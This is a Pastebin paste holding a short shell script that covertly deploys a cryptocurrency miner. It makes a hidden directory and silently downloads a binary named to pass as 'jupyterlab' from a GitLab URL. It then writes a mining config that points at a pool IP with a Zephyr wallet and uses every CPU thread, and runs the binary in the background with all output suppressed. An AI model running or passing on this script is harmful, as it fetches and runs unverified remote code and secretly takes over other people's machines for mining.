Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- cd ~/
- mkdir .wolu && cd .wolu
- #!/bin/sh
- wget -qO wolu https://gitlab.com/ghcees/pack/-/raw/main/jupyterlab && chmod +x wolu >/dev/null 2>&1
- cat > config.json <<END
- {
- "autosave": true,
- "randomx": {
- "1gb-pages": true
- },
- "cpu": {
- "enabled": true,
- "huge-pages": true,
- "rx/0": [-1, -1, -1, -1,-1, -1, -1, -1]
- },
- "pools": [
- {
- "algo": "null",
- "coin": null,
- "url": "47.237.30.51:1123",
- "user": "ZEPHsCKmc1SXiZFnBPfeVHUxjs1XikpsqLWPHmHx2sNE6foC6aXdPUYJdGtxw6r9M5BsLKzV4tFcxfQHZqTM1AmSZxiGgFxo7A1",
- "pass": "ALL-$(TZ=UTC-7 date +"%D-%H")",
- "keepalive": true,
- }
- ],
- }
- END
- nohup ./wolu &>/dev/null &
- clear && ps
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement